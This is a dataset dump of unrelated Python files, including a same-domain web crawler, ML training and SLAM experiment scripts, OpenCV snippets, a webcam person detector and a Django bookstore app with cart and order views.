log.error(\"We failed to reach: (%d)%s \\n Reason: %s\" %(deep, url, e.reason))\n        elif hasattr(e, 'code'):\n            log.error(\"Couldn't fulfill the request: (%d)%s\\n Error code: %s\" %(deep, url, e.code))\n    except BadStatusLine:\n        log.warn(\"Could not fetch: (%d)%s\" %(deep, url))\n    except UnicodeError:\n        log.error(\"UnicodeError: (%d)%s\" %(deep, url))\n        #queue.put((deep, url.encode('raw_unicode_escape')))\n    except Exception:\n        pass\n    else:\n        log.debug(u'Fetched source successfully: (%d)%s' %(deep, url))\n\n    try:\n        return response.read()\n    except urllib2.socket.timeout:\n        log.error('Timeout: %s' %url)\n        return ''\n\n\n\ndef processHtml(response, options_url, url, log):\n    '''Process the fetched HTML source and filter out the links in the same domain as the crawled site'''\n    links = []\n    real_link = []\n    same_site = []\n    try:\n        html = BeautifulSoup(response, 'lxml')\n    except TypeError:\n        html = BeautifulSoup(str(response), 'lxml')\n\n    log.debug(u'Filtering tags out of the source: %s' %url)\n    for a in html.find_all(\"a\"):\n        try:\n            links.append(a[\"href\"])\n        except Exception:\n            continue\n    log.debug(u'Filtering done: %s' %url)\n\n    #check whether each item is a URL\n    for i in set(links):\n        log.debug(u'Checking whether it is a URL: %s' %i)\n        if i.startswith('http') or i.startswith('?') or i.startswith('/'): #check whether the URL is well-formed\n            if not i.startswith('http'): #convert relative addresses to absolute ones\n                if not i.startswith('/'):\n                    i = '/'+i\n                absolute_path = urlparse.urljoin(url, i)\n                i = absolute_path\n                log.debug(u'Converted to absolute address: %s' %i)\n            if i in visited_links: #skip URLs that have already been crawled\n                log.debug(u'Already visited this URL: %s' %i)\n                continue\n            log.debug(u'Valid URL: %s' %i)\n            real_link.append(i)\n        else:\n            log.debug(u'Invalid URL: %s' %i)\n\n    #check whether the URL is in the same domain as the input URL\n    for u in real_link:\n        #split the domain part of the URL on \".\" into a list\n        log.debug(u'Checking whether it is the same domain: %s' %u)\n        separate_input_url = (urlparse.urlparse(options_url).netloc).split(\".\")\n        separate_url = (urlparse.urlparse(u).netloc).split(\".\")\n\n        si = len(separate_input_url) - 1\n        su = len(separate_url) - 1\n\n        #compare the lists; if they match, the domains are the same\n        while((separate_url[su]).lower() == (separate_input_url[si]).lower()):\n            if (si == 1):\n                separate_input_url[0] == \"www\"\n                same_site.append(u)\n                log.debug(u'Same domain as the crawled URL: %s' %u)\n                break\n            if (si == 0):\n                same_site.append(u)\n                log.debug(u'Same domain as the crawled URL: %s' %u)\n                break\n            si = si - 1\n            su = su - 1\n    visited_links.extend(same_site)\n\n    return same_site\n\n\ndef save2Db(options_deep, options_dbfile, log):\n    '''Store the given URL and depth in the specified database'''\n    log.debug(u'Connecting to the database')\n    with sqlite3.connect(options_dbfile, isolation_level=None, check_same_thread=False) as connect_db:\n        db = connect_db.cursor()\n        log.debug(u'Connected to the database')\n        log.debug(u'Creating table')\n        try:\n            db.execute(\"CREATE TABLE links(hierarchy INTEGER, URL TEXT)\")\n        except sqlite3.OperationalError:\n            
log.debug(u'Table already exists')\n        else:\n            log.debug(u'Table created successfully')\n\n        while True:\n            try:\n                (deep, url) = db_queue.get(True, 30)\n            except Empty:\n                log.debug('Dbqueue is Empty')\n                break\n            except Exception as err:\n                log.debug('DB: Exception %s' %err)\n                continue\n            else:\n                if deep <= (options_deep+1):\n                    log.debug(u'Storing %s' %url)\n                    try:\n                        db.execute(\"INSERT INTO links (hierarchy, URL) VALUES(?, ?)\",(int(deep), url))\n                    except Exception:\n                        pass\n                    log.debug(u'Stored successfully: %s' %url)\n                    print(deep, url)\n                    db_queue.task_done()\n                else:\n                    break\n\n\n\ndef checkKeyword(options_keyword, req):\n    '''Check whether a keyword search is needed; if so, search for it'''\n    if options_keyword == \"\":\n        return True\n    else:\n        if req.find(options_keyword) != -1:\n            return True\n        else:\n            return False\n\n\ndef logSet(log_level):\n    '''Set the logging level'''\n    levels = {1:logging.DEBUG,\n              2:logging.INFO,\n              3:logging.WARNING,\n              4:logging.ERROR,\n              5:logging.CRITICAL}\n\n    log = logging.getLogger('creepsmonkey')\n    log.setLevel(levels.get(log_level, \"logging.WARNING\"))\n    fh = logging.FileHandler(\"log\", mode='w', encoding='UTF-8')\n    formatter = logging.Formatter(\"%(levelname)s - %(asctime)s - %(message)s\")\n    fh.setFormatter(formatter)\n    log.addHandler(fh)\n\n    return log\n\n\ndef getUrl(options_url, options_keyword, options_deep, log):\n    while True:\n        try:\n            (deep, url) = queue.get(True, 30)\n        except Empty:\n            log.debug('queue is Empty')\n            break\n        except Exception:\n            continue\n        else:\n            if deep <= options_deep: #check whether the crawl depth limit has been reached\n                response = fetchPage(deep, url, log)\n\n                if checkKeyword(options_keyword, response):\n                    log.debug(u'Parsing HTML source: %s' %url)\n                    urls = processHtml(response, options_url, url, log)\n\n                    for i in urls: #add the crawled URLs to the queue\n                        if deep < options_deep:\n                            queue.put((deep+1, i))\n                            db_queue.put((deep+1, i))\n            queue.task_done()\n\n\nif __name__ == \"__main__\":\n    option = optparse.OptionParser()\n    option.add_option(\"-u\", \"--url\", dest=\"url\", default=\"http://www.baidu.com\", type=\"string\", help=u\"URL to crawl\")\n    option.add_option(\"-d\", \"--deep\", dest=\"deep\", default=0, type=\"int\", help=u\"crawl depth\")\n    option.add_option(\"-t\", \"--threadpool\", dest=\"threadpool\", default=10, type=\"int\", help=u\"number of threads in the thread pool\")\n    option.add_option(\"-f\", \"--dbfile\", dest=\"dbfile\", default=\"dbfile\", type=\"string\", help=u\"database file name\")\n    option.add_option(\"-k\", \"--keyword\", dest=\"keyword\", default=\"\", type=\"string\", help=u\"keyword that pages must contain\")\n    option.add_option(\"-l\", \"--loglevel\", dest=\"loglevel\", default=\"1\", type=\"int\", help=u\"logging level, 1-5; higher is more verbose\")\n    (options, args) = option.parse_args()\n\n    log = logSet(options.loglevel)\n    queue.put((-1, options.url))\n    visited_links.append(options.url)\n\n    for i in range(options.threadpool):\n        t = Thread(target=getUrl, args=(options.url, options.keyword, options.deep, log))\n        t.daemon = True\n        t.start()\n    log.debug(u'Crawl started')\n\n    for u in range(options.threadpool):\n        tdb = Thread(target=save2Db, args=(options.deep, options.dbfile, log))\n        tdb.daemon = True\n        tdb.start()\n\n    queue.join()\n    db_queue.join()\n\n    log.info(u'Crawled %s links in total' %len(visited_links))\n","sub_path":"creepsmonkey.py","file_name":"creepsmonkey.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"216317856","text":"#!/usr/bin/python\n# -*- coding: latin-1 -*-\n\n__author__ = 'jonepol'\n\n\n#reads the histdata files and slices them into 10-second (or 1-minute) bins\n#downloaded from histdata.com\n#opens the zip\n#averages over timebin seconds, timebin = 10\n#computes some temporal parameters 
such as bollinger, etc.\n\n\nchemin =\"c:\\\\essais\\\\hisdata\"\n\n#read a zip\nimport zipfile\nimport csv\nimport io\n\ndef scanzip(paire,annee, mois):\n    nomfich = \"c:\\\\essais\\\\hisdata\"+\"\\\\\"+\"HISTDATA_COM_ASCII_EURUSD_T201606\"+\".zip\"\n    lezip = zipfile.ZipFile(nomfich)\n    lecsv = lezip.open(\"DAT_ASCII_EURUSD_T_201606.csv\",\"rU\")\n\n    lecsv_file = io.TextIOWrapper(lecsv)\n\n    reader = csv.reader(lecsv_file, delimiter=',')\n    for row in reader: #each line is a tuple\n        annee = int(row[0][0:4])\n        mois = int(row[0][4:6])\n        jour = int(row[0][6:8])\n        heure = int(row[0][9:11])\n        minute = int(row[0][11:13])\n        seconde = int(row[0][13:15])\n        milli = int(row[0][15:])\n        nb1 = float(row[1])\n        nb2 = float(row[2])\n        #check: good, the import works\n        #print(annee,mois,jour,heure,minute,seconde,milli,nb1,nb2)\n\n\n    #print data\n\n    #for line in lecsv:\n    #    print(line)\n\n\n\nscanzip(\"EURUSD\",2016,5)","sub_path":"readtick_hisdata.py","file_name":"readtick_hisdata.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"114361079","text":"\"\"\"\nhydraulic network\n\"\"\"\n\n\nfrom __future__ import division\n\n__author__ = \"Thuy-An Nguyen\"\n__copyright__ = \"Copyright 2015, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Thuy-An Nguyen\", \"Tim Vollrath\", \"Jimeno A. Fonseca\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"cea@arch.ethz.ch\"\n__status__ = \"Production\"\n\n\n\n\n# investment and maintenance costs\n\ndef calc_Cinv_network_linear(LengthNetwork, gV):\n    \"\"\"\n    calculate annualised network investment cost with a linearized function.\n\n    :param LengthNetwork: total length of the network in [m]\n    :param gV: globalvar.py\n\n    :returns InvCa: annualised investment cost of the thermal network\n    :rtype InvCa: float\n\n    \"\"\"\n\n    InvC = 0\n    InvC = LengthNetwork * gV.PipeCostPerMeterInv\n    InvCa = InvC * gV.PipeInterestRate * (1+ gV.PipeInterestRate) ** gV.PipeLifeTime / ((1+gV.PipeInterestRate) ** gV.PipeLifeTime - 1)\n\n    return InvCa\n\n","sub_path":"cea/technologies/heating_network/thermal_network.py","file_name":"thermal_network.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"610360670","text":"\n\n#class header\nclass _EJECT():\n\tdef __init__(self,): \n\t\tself.name = \"EJECT\"\n\t\tself.definitions = [u'to force someone to leave a particular place: ', u'to order a sports player to leave the playing area during a game because they have broken a rule', u'to leave an aircraft in an emergency using an ejection seat', u'to come out of a machine when a button is pressed, or to make something do this: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_eject.py","file_name":"_eject.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"573616201","text":"import argparse\n\nfrom horch.core.catalog.helper import get_optimizer, get_lr_scheduler, get_dataloader, get_model\n\nimport torch\nimport torch.nn as nn\nfrom torchvision.datasets import CIFAR10\n\nfrom horch.core import load_yaml_config\nfrom horch.config import cfg as global_cfg, 
from horch.datasets import train_test_split\nfrom horch.nn.loss import CrossEntropyLoss\nfrom horch.train import manual_seed\nfrom horch.train.classification.mix import get_mix\nfrom horch.train.classification.trainer import Trainer\nfrom horch.train.metrics import TrainLoss, Loss\nfrom horch.train.metrics.classification import Accuracy\n\nimport horch.models.cifar\n\nfrom torchvision.transforms import Compose\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Train CIFAR10.')\n parser.add_argument('-c', '--config', help='config file')\n parser.add_argument('-r', '--resume', help='resume from checkpoints')\n args = parser.parse_args()\n\n cfg = load_yaml_config(args.config)\n\n if cfg.get(\"Global\"):\n global_cfg.merge_from_other_cfg(load_from_dict(cfg.get(\"Global\")))\n\n manual_seed(cfg.seed)\n\n if cfg.get(\"benchmark\"):\n torch.backends.cudnn.benchmark = True\n\n train_transform = Compose(cfg.Dataset.Train.transforms)\n test_transform = Compose(cfg.Dataset.Test.transforms)\n\n data_home = cfg.Dataset.data_home\n ds_train = CIFAR10(data_home, train=True, download=True, transform=train_transform)\n ds_test = CIFAR10(data_home, train=False, download=True, transform=test_transform)\n\n if cfg.get(\"Debug\") and cfg.Debug.get(\"subset\"):\n ratio = cfg.Debug.subset\n ds_train = train_test_split(ds_train, test_ratio=ratio, random=True)[1]\n ds_test = train_test_split(ds_test, test_ratio=ratio, random=True)[1]\n\n train_loader = get_dataloader(cfg.Dataset.Train, ds_train)\n test_loader = get_dataloader(cfg.Dataset.Test, ds_test)\n\n net = get_model(cfg, horch.models.cifar)\n\n criterion = CrossEntropyLoss(label_smoothing=cfg.get(\"label_smooth\"))\n\n optimizer = get_optimizer(cfg.Optimizer, net)\n lr_scheduler = get_lr_scheduler(cfg.LRScheduler, optimizer)\n\n mix = get_mix(cfg.get(\"Mix\"))\n\n metrics = {\n 'loss': TrainLoss(),\n 'acc': Accuracy(mix),\n }\n\n test_metrics = {\n 'loss': Loss(nn.CrossEntropyLoss()),\n 'acc': Accuracy(),\n }\n\n trainer = Trainer(net, criterion, optimizer, lr_scheduler,\n metrics, test_metrics, save_path=cfg.save_path, mix=mix,\n fp16=cfg.get(\"fp16\", False))\n\n if args.resume:\n if args.resume == 'default':\n trainer.resume()\n else:\n trainer.resume(args.resume)\n\n trainer.fit(train_loader, cfg.epochs, val_loader=test_loader,\n eval_freq=cfg.get(\"eval_freq\", 1), save_freq=cfg.get(\"save_freq\"),\n n_saved=cfg.get(\"n_saved\", 1), progress_bar=cfg.get(\"progress_bar\", False))\n","sub_path":"tools/train_cifar10.py","file_name":"train_cifar10.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"158216077","text":"import tensorflow as tf\n\n\ndef convert_score_to_rank(features, label, scores):\n \"\"\"\n Convert scores for each record to rank within query\n\n Parameters\n ----------\n features: dict of tensors\n Dictionary of tensors that are the features used by the model\n label: Tensor\n Tensor object for the true label\n scores: Tensor\n Tensor object containing the scores for each record within a query\n Shape -> [batch_size, sequence_size, 1]\n\n Returns\n -------\n Tensor\n Rank of each record within a query for all queries in the batch\n Shape -> [batch_size, sequence_size, 1]\n \"\"\"\n scores = tf.squeeze(scores, axis=-1)\n sorted_indices = tf.argsort(scores, axis=-1, direction=\"DESCENDING\", stable=True)\n ranks = tf.argsort(sorted_indices, stable=True)\n ranks = tf.add(ranks, tf.constant(1))\n ranks = tf.expand_dims(ranks, axis=-1)\n\n return ranks\n
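\n# A quick check of the double-argsort trick above, with made-up numbers\n# (assumption: eager TensorFlow; for illustration only, not part of the API):\n#\n# scores = [[0.2, 0.9, 0.5]]  -> argsort descending -> [[1, 2, 0]]\n# argsort of [[1, 2, 0]]      -> [[2, 0, 1]]  -> + 1 -> ranks [[3, 1, 2]]\n# i.e. the highest score (0.9) gets rank 1, the lowest (0.2) gets rank 3.\n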
","sub_path":"python/ml4ir/applications/ranking/model/scoring/prediction_helper.py","file_name":"prediction_helper.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"198603240","text":"import cv2\n\nimg = cv2.imread(\"Resources/grid.png\")\nprint(img.shape) # (Height,Width,bgr)\nimgResize = cv2.resize(img,(400,300)) # (src,(Width,Height))\nimgResize2 = cv2.resize(img,(722,577)) # (Width , Height)\ncv2.imshow(\"Normal\",img)\ncv2.imshow(\"Res\",imgResize)\ncv2.imshow(\"Res_2\",imgResize2)\n\nimgCrop = img[10:600,10:500] # [height_min:height_max,width_min:width_max]\n\ncv2.imshow(\"Cropped\",imgCrop)\ncv2.waitKey(0)\n","sub_path":"Chapter_3/Crop & Resizing.py","file_name":"Crop & Resizing.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"570574854","text":"\"\"\"\nmain_implementation.py\nFile for the offline implementation of NDT-SLAM on the NAVLab resident powerhouse machine\nAuthor: Ashwin Kanhere\nDate Created: 16th June 2019\nDate Modified: 2nd February, 2020\n\"\"\"\nimport numpy as np\nimport ndt\nimport utils\nfrom matplotlib import pyplot as plt\nimport data_utils\nfrom argparse import ArgumentParser\n\ndef main(args):\n \"\"\"\n For a method of NDT approximation, this function samples random initial displacements \n between given ranges and solves the Consensus and Naive NDT odometry.\n The time taken, rotation error, and displacement error of the Consensus and Naive NDT \n odometry methods are compared.\n \"\"\"\n\n print('Setting model parameters')\n\n run_no = 1\n plot_fig = args.plot_figs\n\n run_mode = args.run_mode\n total_iters = args.total_iters\n iter1 = args.iter1\n iter2 = args.iter2\n num_pcs = args.num_pcs\n num_odom_vects = args.num_odom_vects\n test_mode = args.test_mode\n\n max_x = 0.4\n max_y = 0.4\n max_z = 0.1\n max_phi = 10\n max_theta = 10\n max_psi = 30\n\n odom_limits = np.array([max_x, max_y, max_z, max_phi, max_theta, max_psi])\n\n # Choose the voxel lengths at which NDT approximation will be calculated. 
If a single value is used, only 1 NDT approximation will be performed\n scale_array = np.array([2., 1.]) # np.array([2., 1., 0.5]) # np.array([1.])\n\n assert(total_iters == iter1 + iter2)\n\n print('Loading dataset')\n pcs = data_utils.load_uiuc_pcs(0, num_pcs-1, mode=run_mode)\n\n # Choose the different values of the voxel consensus metric which'll be used to remove low consensus voxels\n integrity_filters = np.array([0.3, 0.4, 0.5, 0.6, 0.7, 0.8]) # np.array([0.5, 0.8])\n\n num_int_vals = np.size(integrity_filters)\n\n print('Creating placeholder variables for storing errors')\n\n odom_vectors = np.zeros([num_int_vals, num_pcs, num_odom_vects, 6])\n\n vanilla_time = np.zeros([num_int_vals, num_pcs, num_odom_vects])\n vanilla_pos_error = np.zeros_like(vanilla_time)\n vanilla_rot_error = np.zeros_like(vanilla_time)\n\n consensus_time = np.zeros_like(vanilla_time)\n consensus_pos_error = np.zeros_like(vanilla_pos_error)\n consensus_rot_error = np.zeros_like(vanilla_rot_error)\n\n for pc_idx, ref_pc in enumerate(pcs):\n for odom_idx in range(num_odom_vects):\n \n rand_num = 2*(np.random.rand(6) - 0.5) # Choose a random odometry vector to test convergence of algorithm\n test_odom = odom_limits*rand_num\n inv_test_odom = utils.invert_odom_transfer(test_odom)\n\n print('Creating transformed test point cloud')\n trans_pc = utils.transform_pc(test_odom, ref_pc)\n\n print('\\nRunning vanilla multi-scale NDT for PC:', pc_idx, 'odometry: ', odom_idx, '\\n')\n\n vanilla_odom, test_van_time, _ = ndt.multi_scale_ndt_odom(np.copy(ref_pc), np.copy(trans_pc), scale_array, 0.5,\n test_mode, total_iters, 0)\n\n for cv_idx, cv in enumerate(integrity_filters):\n print('\\nExperiment for C_v:', cv, ' pc number:', pc_idx, 'odometry:', odom_idx, '\\n')\n print('Running consensus multi-scale NDT')\n consensus_odom, test_con_time, _ = ndt.multi_scale_ndt_odom(np.copy(ref_pc), np.copy(trans_pc),\n scale_array, cv, test_mode, iter1, iter2)\n\n print('Computing and storing error and timing values')\n\n consensus_odom_diff = consensus_odom - inv_test_odom\n consensus_time[cv_idx, pc_idx, odom_idx] = test_con_time\n consensus_pos_error[cv_idx, pc_idx, odom_idx] = np.linalg.norm(consensus_odom_diff[:3])\n consensus_rot_error[cv_idx, pc_idx, odom_idx] = np.linalg.norm(consensus_odom_diff[3:])\n\n vanilla_odom_diff = vanilla_odom - inv_test_odom\n\n odom_vectors[:, pc_idx, odom_idx, :] = inv_test_odom\n\n vanilla_time[:, pc_idx, odom_idx] = test_van_time\n vanilla_pos_error[:, pc_idx, odom_idx] = np.linalg.norm(vanilla_odom_diff[:3])\n vanilla_rot_error[:, pc_idx, odom_idx] = np.linalg.norm(vanilla_odom_diff[3:])\n\n if pc_idx % 10 == 0:\n print('Saving computed values')\n np.save('consensus_values_' + test_mode + '_' + str(run_no), integrity_filters)\n np.save('odometry_vectors' + test_mode + '_' + str(run_no), odom_vectors)\n np.save(\"vanilla_time_\" + test_mode + '_' + str(run_no), vanilla_time)\n np.save(\"vanilla_pos_error_\" + test_mode + '_' + str(run_no), vanilla_pos_error)\n np.save(\"vanilla_rot_error_\" + test_mode + '_' + str(run_no), vanilla_rot_error)\n\n np.save(\"consensus_time_\" + test_mode + '_' + str(run_no), consensus_time)\n np.save(\"consensus_pos_error_\" + test_mode + '_' + str(run_no), consensus_pos_error)\n np.save(\"consensus_rot_error_\" + test_mode + '_' + str(run_no), consensus_rot_error)\n\n\n\n if plot_fig:\n plt.close('all')\n plot_vanilla_time = utils.plot_averaged(vanilla_time)\n plot_vanilla_pos_error = utils.plot_averaged(vanilla_pos_error)\n plot_vanilla_rot_error = 
utils.plot_averaged(vanilla_rot_error)\n\n plot_consensus_time = utils.plot_averaged(consensus_time)\n plot_consensus_pos_error = utils.plot_averaged(consensus_pos_error)\n plot_consensus_rot_error = utils.plot_averaged(consensus_rot_error)\n\n plt.figure()\n plt.plot(integrity_filters, plot_vanilla_time, label='Vanilla Timing')\n plt.plot(integrity_filters, plot_consensus_time, label='Consensus Timing')\n plt.title(\"Timing comparison\")\n plt.legend(loc=\"upper right\")\n\n plt.figure()\n plt.plot(integrity_filters, plot_vanilla_pos_error, label='Vanilla Position Error')\n plt.plot(integrity_filters, plot_consensus_pos_error, label='Consensus Position Error')\n plt.title(\"Position Error comparison\")\n plt.legend(loc=\"upper right\")\n\n plt.figure()\n plt.plot(integrity_filters, plot_vanilla_rot_error, label='Vanilla Rotation Error')\n plt.plot(integrity_filters, plot_consensus_rot_error, label='Consensus Rotation Error')\n plt.title('Rotation Error comparison')\n plt.legend(loc=\"upper right\")\n\n plt.show()\n\n print('Saving computed values')\n np.save('consensus_values_' + test_mode + '_' + str(run_no), integrity_filters)\n np.save('odometry_vectors' + test_mode + '_' + str(run_no), odom_vectors)\n np.save(\"vanilla_time_\" + test_mode + '_' + str(run_no), vanilla_time)\n np.save(\"vanilla_pos_error_\" + test_mode + '_' + str(run_no), vanilla_pos_error)\n np.save(\"vanilla_rot_error_\" + test_mode + '_' + str(run_no), vanilla_rot_error)\n\n np.save(\"consensus_time_\" + test_mode + '_' + str(run_no), consensus_time)\n np.save(\"consensus_pos_error_\" + test_mode + '_' + str(run_no), consensus_pos_error)\n np.save(\"consensus_rot_error_\" + test_mode + '_' + str(run_no), consensus_rot_error)\n\n return 0\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument('--plot_figs', dest='plot_figs', action='store_true', default=True)\n parser.add_argument('--run_mode', type=str, choices=['server', 'laptop'], default='laptop')\n parser.add_argument('--test_mode', type=str, choices=['overlap','nooverlap','interpolate'], default='overlap')\n parser.add_argument('--total_iters', type=int, default=20)\n parser.add_argument('--iter1', type=int, default=10)\n parser.add_argument('--iter2', type=int, default=10)\n parser.add_argument('--num_pcs', type=int, choices=[2,30,100], default=2)\n parser.add_argument('--num_odom_vects', type=int, choices=[5,10], default=5)\n \n args = parser.parse_args()\n main(args)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"364729112","text":"import pandas as pd # import pandas to handle the csv file\r\nimport matplotlib.pyplot as plt # import matplotlib.pyplot under the short name plt\r\nunrate = pd.read_csv('0634.csv') # read the csv file\r\ndata = unrate[0:] # take all rows of the data\r\n\r\nplt.plot(data['epoch'], data['label0'], color='deeppink', label='label 0')\r\nplt.plot(data['epoch'], data['label1'], color='orange', label='label 1')\r\nplt.plot(data['epoch'], data['label2'], color='limegreen', label='label 2')\r\nplt.plot(data['epoch'], data['label3'], color='dodgerblue', label='label 3')\r\nplt.legend()\r\n\r\nplt.xlabel('epoch') # label the x axis\r\nplt.ylabel('avg_dice_loss') # label the y axis\r\nplt.title('Dice Loss Line Graph in Training Period') # add a title to the whole chart\r\n\r\nplt.show() # display the figure just drawn\r\n
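#\r\n# Note: the slice above keeps every row; if only the first 12 epochs were\r\n# wanted (as an earlier comment suggested), the hypothetical variant would be:\r\n# data = unrate[0:12]\r\n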
","sub_path":"line_chart.py","file_name":"line_chart.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"271949635","text":"import cv2\r\nfrom imageai.Detection import ObjectDetection\r\nimport os\r\nfrom clarifai import rest\r\nfrom clarifai.rest import ClarifaiApp\r\n\r\n\r\n# Returns the current working directory of the process.\r\nexecution_path = os.getcwd()\r\n\r\nprint(execution_path)\r\n\r\n#Initialize the detector.\r\ndetector = ObjectDetection()\r\n\r\n#This sets the object detection model instance to the pretrained \"RetinaNet\" model.
\r\ndetector.setModelTypeAsRetinaNet()\r\n\r\n#Set the model path to the model file we downloaded (the ResNet model trained on the COCO dataset)\r\ndetector.setModelPath(os.path.join(execution_path , \"resnet50_coco_best_v2.0.1.h5\"))\r\n\r\n#Load the model.\r\ndetector.loadModel()\r\ncap = cv2.VideoCapture(1) \r\n#Note: 0 is the internal camera and 1 is the external webcam.\r\n\r\nz=0\r\nwhile(1):\r\n #Photo analysis.\r\n z += 1\r\n ret, frame = cap.read()\r\n cv2.imshow(\"imshow\",frame)\r\n cv2.waitKey(1)\r\n print(z)\r\n if z == 30:\r\n z = 0\r\n y = 0\r\n cv2.imwrite('C:/Users/adity/desktop/image'+str(y)+'.png', frame)\r\n print(\"Wrote Image\")\r\n\r\n detections = detector.detectObjectsFromImage(input_image=os.path.join(execution_path, 'C:/Users/adity/desktop/image'+str(y)+'.png'),\r\n output_image_path=os.path.join(execution_path, \"output.jpg\"))\r\n for x in detections:\r\n if(x[\"name\"] == \"person\" and int(x[\"percentage_probability\"]) > 80):\r\n print(\"person\" + \" \" + str(int(x[\"percentage_probability\"])))\r\n","sub_path":"person detection.py","file_name":"person detection.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"3006851","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib import messages\nfrom . forms import *\nfrom django.views import generic\n\ndef index(request):\n try:\n if request.session['user_id']:\n return redirect('profile')\n finally: \n return render(request = request, template_name = 'home.html')\n\ndef signup(request):\n if request.method == 'POST':\n form = SignupForm(request.POST)\n if form.is_valid():\n newUser = Customer()\n newUser.user_id = form.cleaned_data.get('user_id')\n newUser.email = form.cleaned_data.get('email')\n newUser.password = form.cleaned_data.get('password')\n newUser.first_name = form.cleaned_data.get('first_name')\n newUser.middle_name = form.cleaned_data.get('middle_name')\n newUser.last_name = form.cleaned_data.get('last_name')\n newUser.phone_no = form.cleaned_data.get('phone_no')\n newUser.save()\n\n #username = form.cleaned_data.get('user_id')\n #raw_password = form.cleaned_data.get('password')\n #user = authenticate(username=username, password=raw_password)\n #login(request, user)\n #messages.info(request, \"Welcome to KGP\")\n return redirect('index')\n else:\n messages.error(request, \"Invalid Form Details\")\n form = SignupForm()\n return render(request, 'users/sign_up.html', {'form': form})\n else:\n form = SignupForm()\n return render(request, 'users/sign_up.html', {'form': form})\n\ndef login(request):\n if request.method == \"POST\":\n print(request)\n form = LoginForm(request.POST)\n if form.is_valid():\n #print(form);\n #return redirect('index');\n username = form.cleaned_data.get('user_id')\n raw_password = form.cleaned_data.get('password')\n user = Customer.objects.filter(user_id = username, password = raw_password)\n if user:\n messages.info(request, f\"You are now logged in as {username}\")\n user_id = request.POST['user_id']\n request.session['user_id'] = user_id\n return redirect('profile')\n else:\n messages.error(request, \"Invalid Username or Password\")\n else:\n messages.error(request, \"Invalid USERNAME or PASSWORD\")\n form = LoginForm()\n return render(request, \"users/login.html\", context= {\"form\":form})\n\ndef userProfile(request):\n if request.session.has_key('user_id'):\n posts = request.session['user_id']\n query = Customer.objects.filter(user_id = posts)\n return render(request, 'users/profile.html', {\"query\":query})\n else:\n return redirect('index')\n
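\n# The views below all repeat the same manual session check; a safer lookup\n# (sketch only, plain Django sessions assumed) would be:\n#\n# user_id = request.session.get('user_id') # returns None instead of raising KeyError\n# if user_id is None:\n# return redirect('index')\n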
\ndef userLogout(request):\n try:\n del request.session['user_id']\n except KeyError:\n pass\n return redirect( 'index')\n# All views starting with \"user\" rely on the user_id stored in the session to identify the user\n\n\n#Returns books added by the particular user\ndef userCart(request, book_id = None):\n if request.session['user_id']:\n user_id = request.session['user_id']\n if 'store_id' in request.GET:\n print(request.GET['store_id'])\n thisBookStore = Book_store.objects.get(store_id = request.GET['store_id'])\n newCart = Cart()\n newCart.user_id = Customer.objects.get(user_id = user_id)\n newCart.book_id = Book.objects.get(book_id = book_id)\n newCart.store_id = thisBookStore\n newCart.price = Book_available.objects.get(store_email = thisBookStore.email, book_id = book_id).price\n #newCart.price = request.GET['store'].price\n newCart.no_of_copies = request.GET['no_of_copies']\n newCart.save()\n books_in_cart = Cart.objects.filter(user_id = user_id)\n total_price = 0\n num_order = 0\n seller_list = []\n for book in books_in_cart:\n total_price += book.price*book.no_of_copies\n return render(request, 'users/userCart.html', {'books_in_cart' : books_in_cart, 'total_price' : total_price})\n else:\n messages.warning(request, 'You are not logged in. Please log in to continue')\n return redirect('index')\n
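\n# The cart total above could equally be computed in one line (illustrative\n# only, using the same Cart fields as in this file):\n# total_price = sum(b.price * b.no_of_copies for b in books_in_cart)\n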
Please log in\")\n return redirect('index')\n \ndef userAddAsPrimaryAddress(request, address_id):\n if request.session['user_id']:\n user_id = request.session['user_id']\n print(address_id)\n all_address = Customer_address.objects.filter(user_id = user_id)\n for address in all_address:\n address.is_current = False\n address.save()\n p_address = Customer_address.objects.get(address_id = address_id)\n p_address.is_current = True\n p_address.save()\n messages.success(request, 'Address Set As Primary')\n return redirect('confirmAddress')\n else:\n messages.error(request, \"Please Log In First\")\n return redirect('index')\n\n\ndef userPlaceOrder(request, address_no):\n if request.session['user_id']:\n user_id = request.session['user_id']\n all_orders = Cart.objects.filter(user_id = user_id)\n store_list = []\n price_list = []\n book_store_ind = []\n count = 0\n for books in all_orders:\n if books.store_id in store_list:\n price_list[store_list.index(books.store_id)] += books.price*(books.no_of_copies)\n \n else:\n store_list.append(books.store_id)\n price_list.append(books.price)\n \n book_store_ind.append(store_list.index(books.store_id))\n count += 1\n \n order_id= [] \n for i in range(0,len(store_list)):\n newOrder = Order()\n print(\"The order Id is \", 